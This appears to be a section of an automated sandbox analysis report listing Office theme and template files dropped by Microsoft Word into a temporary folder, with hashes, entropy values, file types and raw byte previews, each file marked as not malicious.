                                                Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                C:\Users\user\AppData\Local\Temp\TCDF2CA.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):290
                                                Entropy (8bit):3.5091498509646044
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF2EA.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):264
                                                Entropy (8bit):3.4866056878458096
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                MD5:6C489D45F3B56845E68BE07EA804C698
                                                SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF2EA.tmp\ThemePictureAccent.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):6448
                                                Entropy (8bit):7.897260397307811
                                                Encrypted:false
                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                Malicious:false
                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                C:\Users\user\AppData\Local\Temp\TCDF36A.tmp\View.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):486596
                                                Entropy (8bit):7.668294441507828
                                                Encrypted:false
                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                Malicious:false
                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                C:\Users\user\AppData\Local\Temp\TCDF36A.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):274
                                                Entropy (8bit):3.535303979138867
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                MD5:35AFE8D8724F3E19EB08274906926A0B
                                                SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF39A.tmp\Parallax.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):924687
                                                Entropy (8bit):7.824849396154325
                                                Encrypted:false
                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                Malicious:false
                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                C:\Users\user\AppData\Local\Temp\TCDF39A.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):282
                                                Entropy (8bit):3.51145753448333
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF39B.tmp\Parcel.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):608122
                                                Entropy (8bit):7.729143855239127
                                                Encrypted:false
                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                Malicious:false
                                                Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Local\Temp\TCDF39B.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):278
                                                Entropy (8bit):3.516359852766808
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF3CC.tmp\Quotable.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):966946
                                                Entropy (8bit):7.8785200658952
                                                Encrypted:false
                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                Malicious:false
                                                Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                C:\Users\user\AppData\Local\Temp\TCDF3CC.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):282
                                                Entropy (8bit):3.5323495192404475
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF48B.tmp\Berlin.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):976001
                                                Entropy (8bit):7.791956689344336
                                                Encrypted:false
                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Local\Temp\TCDF48B.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):278
                                                Entropy (8bit):3.5270134268591966
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                MD5:327DA4A5C757C0F1449976BE82653129
                                                SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF4BA.tmp\Savon.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1204049
                                                Entropy (8bit):7.92476783994848
                                                Encrypted:false
                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                Malicious:false
                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                C:\Users\user\AppData\Local\Temp\TCDF4BA.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):276
                                                Entropy (8bit):3.5364757859412563
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF568.tmp\Gallery.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1091485
                                                Entropy (8bit):7.906659368807194
                                                Encrypted:false
                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                MD5:2192871A20313BEC581B277E405C6322
                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                Malicious:false
